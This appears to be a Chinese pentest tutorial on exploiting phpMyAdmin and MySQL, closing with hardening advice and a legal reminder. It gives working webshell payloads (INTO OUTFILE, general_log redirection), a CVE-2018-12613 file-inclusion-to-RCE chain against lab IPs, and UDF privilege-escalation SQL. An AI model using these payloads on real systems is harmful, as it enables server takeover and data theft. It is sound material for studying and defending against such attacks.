当前位置: 首页 > wzjs >正文

网站制作和优化永久免费用的在线客服系统

网站制作和优化,永久免费用的在线客服系统,wordpress tag,怎样查看网站是用什么做的目录 一、信息收集与漏洞探测 1. 获取关键信息 2. 权限验证 3. 漏洞扫描 二、历史漏洞利用方法 1. 写入 Webshell 到了这个地步密码探索 2. 远程代码执行(RCE) 3. 提权与后渗透 4. 文件包含漏洞 三、高危历史漏洞列表 四、防御与加固建议 五…

目录

一、信息收集与漏洞探测

1. 获取关键信息

2. 权限验证

3. 漏洞扫描

二、历史漏洞利用方法

1. 写入 Webshell

到了这个地步密码探索

2. 远程代码执行(RCE)

3. 提权与后渗透

4. 文件包含漏洞

三、高危历史漏洞列表

四、防御与加固建议

五、提醒


一、信息收集与漏洞探测

1. 获取关键信息
  • 版本信息:访问 /readme.php/changelog.php 等路径,或查看 /doc/html/index.html 获取版本号,判断是否存在已知漏洞。
  • 绝对路径获取
    • 通过 phpinfo() 页面或报错信息(如注入单引号导致错误)暴露路径。
    • 使用 SHOW VARIABLES LIKE '%datadir%'; 查看数据库路径,推测 Web 目录(如 /var/www/html)。
    • 利用 SELECT load_file('/etc/passwd'); 读取系统文件。

2. 权限验证
  • 检查写入权限
    SHOW VARIABLES LIKE 'secure_file_priv';
    
    • 若值为空,可写入任意目录;若为 /tmp/,仅限该目录。
  • 用户权限:执行 SHOW GRANTS; 确认是否为 root 或高权限账户。

3. 漏洞扫描
  • 已知漏洞探测
    • 本地文件包含:测试 gis_data_editor.php?gis_data[gis_type]=/../../../../etc/passwd%00(需有效 token)。
    • 反序列化漏洞:发送特定 POST 请求尝试读取 /etc/passwd(适用于 phpMyAdmin 2.x)。
    • 跨站请求伪造 (CSRF):构造恶意链接诱导管理员执行 SQL 操作(如删除数据库)。

二、历史漏洞利用方法

1. 写入 Webshell
  • 直接写入
    SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
    
    • 需满足:secure_file_priv 为空且已知 Web 路径。

  • 通过日志记录 PHP 代码生成后门。
  • 开启/关闭情况以及日志存储文件的位置

    • 得知 通过日志我们就可以进行其它渗透行为

Show variables like "general_log%"
  • 日志文件写入
SET GLOBAL general_log = 'ON';  设置打开日志
SET GLOBAL general_log_file =  "C:\\phpStudy\\www\\shell.php"; 日志记录的位置
SELECT '<?php eval($_POST["cmd"]); ?>'; 写入一句话木马
select "<?php system($_REQUEST[cmd]);?>" 系统执行命令
​
show variables like "general_log%" 来验证上述修改是否成功 ​

  • 植入木马后查看dir文件路径:
http://192.168.111.133/shell.php?cmd=dir

  • 执行了dir命令发现yxcms,从这个命令像cms系统,我们试一下访问一下:


  • 到了这个地步密码探索
    • 从页面信息角度收集信息

2. 远程代码执行(RCE)
  • CVE-2016-5734(phpMyAdmin 4.3.0-4.6.2):
    • 利用 preg_replace 的 /e 修饰符漏洞执行命令:
      python3 exploit.py -u root -p root -d test -c "system('id');" http://target.com
      
  • CVE-2018-12613(phpMyAdmin 4.8.0-4.8.1):
    • 构造 URL 包含远程文件或本地 Session 文件(需二次编码绕过检查):
      /index.php?target=db_sql.php%253f/../../../../tmp/sess_[session_id]
      
3. 提权与后渗透
  • UDF 提权(Windows/Linux):
    • 上传自定义 DLL/SO 文件到插件目录,创建函数执行系统命令:
      CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
      SELECT sys_eval('whoami');
      
  • MOF 提权(Windows ≤ 2003):
    • 利用 MySQL 写入恶意 MOF 文件,系统每 5 秒执行一次命令。
4. 文件包含漏洞
  • phpmyadmin 4.8
  • 
    http://192.168.96.133:2003/index.php?target=db_datadict.php%253f/../../../../../../../../etc/passwd

  • 可以通过文件包含漏洞获取服务器权限,我们在选择sql菜单,然后在sql输入如下命令。

  • select "<?php echo 'pwd';?>"

  • 执行sql语句会保存在PHPMyAdmin的临时session文件中

  • 临时的session文件名称可通过bp抓取数据包获得

  • 抓取任意数据包,数据包中Cookie字段phpMyAdmin值加上前追sess_就是临时session文件名

  • Cookie: phpMyAdmin=4a6dfc78f1c64493821a0c327bbca5e6; pma_lang=zh_CN

  • http://192.168.96.133:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_4a6dfc78f1c64493821a0c327bbca5e6

  • 这个时候<?php echo 'pwd';?>会以php代码的形式执行。在文件包好url的访问结果中【文件包含漏洞】我们可以获得服务器执行的pwd结果 我们知道当前的路径是/var/www/html[执行一句话木马的位置]

  • select '<?php echo `echo "<?php eval($_POST[Skull.]);?>" > /var/www/html/11113.php`;?>';

    select '<?php echo `echo "<?php eval($_POST[Skull.]);?>" > /var/www/html/11113.php`;?>';
    http://192.168.96.133:2003/1111.php

三、高危历史漏洞列表

漏洞编号影响版本利用方式修复建议
CVE-2018-199684.0-4.8.3本地文件包含读取敏感信息升级至 4.8.4+
CVE-2016-57344.3.0-4.6.2后台命令执行(需 PHP <5.4.7)升级至 4.6.3+
CVE-2018-126134.8.0-4.8.1远程文件包含升级至 4.8.2+
WooYun-2016-1994332.x反序列化任意文件读取禁用旧版本
CVE-2010-30552.11.x <2.11.10.1通过 setup.php 执行任意代码升级至 2.11.10.1+

四、防御与加固建议

  1. 访问控制

    • 限制 phpMyAdmin 仅允许内网或 VPN 访问,禁用外网暴露。
    • 启用多因素认证(如 Google Authenticator)。
  2. 权限最小化

    • 为 MySQL 分配非 root 用户,禁用 FILE 和 EXECUTE 权限。
    • 配置 secure_file_priv 限制文件读写目录。
  3. 安全更新

    • 及时升级至最新版本(当前最新为 phpMyAdmin 5.2.1)。
  4. 日志与监控

    • 开启审计日志,监控异常 SQL 操作(如 INTO OUTFILE)。
  5. 代码加固

    • 禁用危险函数(如 eval()system())。
    • 使用 Web 应用防火墙(WAF)拦截恶意请求。

五、提醒

  • 合法授权:所有操作需在授权范围内进行,非法入侵将面临法律风险。
  • 漏洞报告:发现漏洞应通过合规渠道上报(如 CVE、CNVD)。

http://www.dtcms.com/wzjs/348035.html

相关文章:

  • 请别人做网站大概要多少钱百度集团公司简介
  • 长沙做网站seo优化外包google国外入口
  • 两性做受技巧视频网站外贸网站平台有哪些
  • 学做ps的软件的网站有哪些seo上海公司
  • 西樵网站建设公司南京seo排名公司
  • 菏泽做网站的公司站长收录平台
  • 手机网站建设设计seo研究中心
  • wordpress如何换图片不显示不出来南宁seo标准
  • 微信网站是多少营销策划书范文1000字
  • 网站建设方案word香港域名注册网站
  • 网站制作哪家好薇网上怎么做推广
  • 福州网上商城网站建设网络营销策略理论有哪些
  • wordpress页面无法评论临安网站seo
  • 吉林大学学风建设专题网站怎么做网站教程
  • 网站的关键词挖掘方式南宁seo排名收费
  • 网站要跟换域名怎么做广告投放推广平台
  • 网络营销的步骤杭州seo公司
  • 网站错误提示页设计网站建设策划书
  • 两学一做网站是多少营销型网站制作建设
  • 网站毕设怎么做电商运营工资大概多少
  • 聊城汽车网站建设成都seo专家
  • 备案没有商城可以做商城网站吗学it需要什么学历基础
  • 深圳地铁公司官网谷歌seo 优化
  • 沈阳犀牛云做网站怎么样推广注册app赚钱平台
  • 合肥制作网站单位有哪些长沙网站制作
  • 怎样提高网站打开速度慢河南网站推广
  • 深圳市做网站知名公司有哪些站内关键词自然排名优化
  • 做自己卖东西的网站杭州seo建站
  • 上海高端网站开发站霸网络优化大师官网入口
  • 建设考试网站国外免费推广网站有哪些